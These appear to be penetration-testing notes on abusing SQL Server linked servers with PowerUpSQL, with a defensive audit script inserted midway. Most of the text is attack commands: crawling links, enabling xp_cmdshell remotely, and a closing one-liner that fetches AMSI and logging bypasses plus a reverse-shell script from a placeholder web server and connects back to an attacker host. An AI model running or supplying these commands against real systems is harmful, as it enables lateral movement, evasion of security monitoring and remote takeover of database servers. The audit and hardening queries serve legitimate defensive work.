SQL Servers

Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.ps1
. C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
  • A database link allows SQL Server to access external data sources such as other SQL Servers and OLE DB data sources.
  • In the case of database links between SQL Servers (linked servers), it is possible to execute stored procedures on the remote server.
  • Database links work even across forest trusts.
Get-SQLServerLink -Instance sql-machine -Verbose
select * from master..sysservers
  • The openquery() function can be used to run queries on a linked server.
select * from openquery("sql-machine", 'select * from master..sysservers')
Get-SQLServerLinkCrawl -Instance sql-machine -Verbose
select * from openquery("sql-machine", 'select * from openquery("sql-machine-next", "select * from master..sysservers")')

Executing Commands

  • On the target server, xp_cmdshell must already be enabled; or
  • if RPC Out is enabled on the link (it is disabled by default), xp_cmdshell can be enabled remotely using:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "sql-machine"
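The two preconditions above (a link with RPC Out enabled, and xp_cmdshell enabled or enableable on the remote side) are exactly what a defender should inventory on every instance. The following audit script is an added example, not part of the original notes or of PowerUpSQL; it relies only on the standard catalog views sys.servers, sys.linked_logins and sys.configurations and on the documented sp_serveroption / sp_configure procedures, and it uses the link name sql-machine from the notes as a placeholder.

```sql
-- Added audit script (not from the original notes). Run on each SQL Server
-- instance with sysadmin-equivalent rights. Assumes SQL Server 2008 or later,
-- where the catalog views below exist.

-- 1. Every linked server, with the two options that matter for link abuse:
--    rpc out (allows EXECUTE ... AT <server> on the remote side) and
--    data access (allows OPENQUERY / four-part names to reach it).
--    A fixed remote login (remote_name) that is sysadmin on the remote plus
--    rpc out = 1 is the condition under which xp_cmdshell can be enabled
--    remotely by anyone who can use the link.
SELECT s.name                   AS linked_server,
       s.data_source,
       s.product,
       s.provider,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       ll.remote_name           AS mapped_remote_login,  -- NULL when no fixed login
       ll.uses_self_credential  AS forwards_caller_ctx   -- 1 = caller's own identity is used
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- 2. Is xp_cmdshell (or another OS/code-execution surface) enabled on this instance?
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled');

-- 3. Hardening: turn off rpc out on a link that only needs read access, and
--    disable xp_cmdshell locally. 'sql-machine' is the placeholder link name.
EXEC sp_serveroption @server = 'sql-machine', @optname = 'rpc out', @optvalue = 'false';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Review the first result set for links whose mapped remote login is a high-privilege account on the far side; those are the links a crawl would traverse, and a chain of them is how the traversal crosses trust boundaries. Changes to xp_cmdshell via sp_configure are recorded by the default trace and by SQL Audit when a server audit covers SERVER_OPERATION_GROUP, so alerting on that event catches the EXECUTE ... AT enablement step shown above.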

Use the -QueryTarget parameter to run the query on a specific instance only (without -QueryTarget the command tries to use xp_cmdshell on every link in the chain).

Get-SQLServerLinkCrawl -Instance sql-machine-starting -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget sql-machine
select * from openquery("sql-machine",'select * from openquery("sql-machine-next","select * from openquery("outer-sql-machine", ""select @@version as version;exec master..xp_cmdshell "powershell whoami)"")")')
Get-SQLServerLinkCrawl -Instance first-instance -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://your.webserver/sbloggingbypass.txt);iex(iwr -UseBasicParsing http://your.webserver/amsibypass);iex (iwr -UseBasicParsing http://your.webserver/Invoke-PowershellTcp.ps1);Power -Reverse -IPAddress foothold.ip -Port listening.port"''' -QueryTarget last.node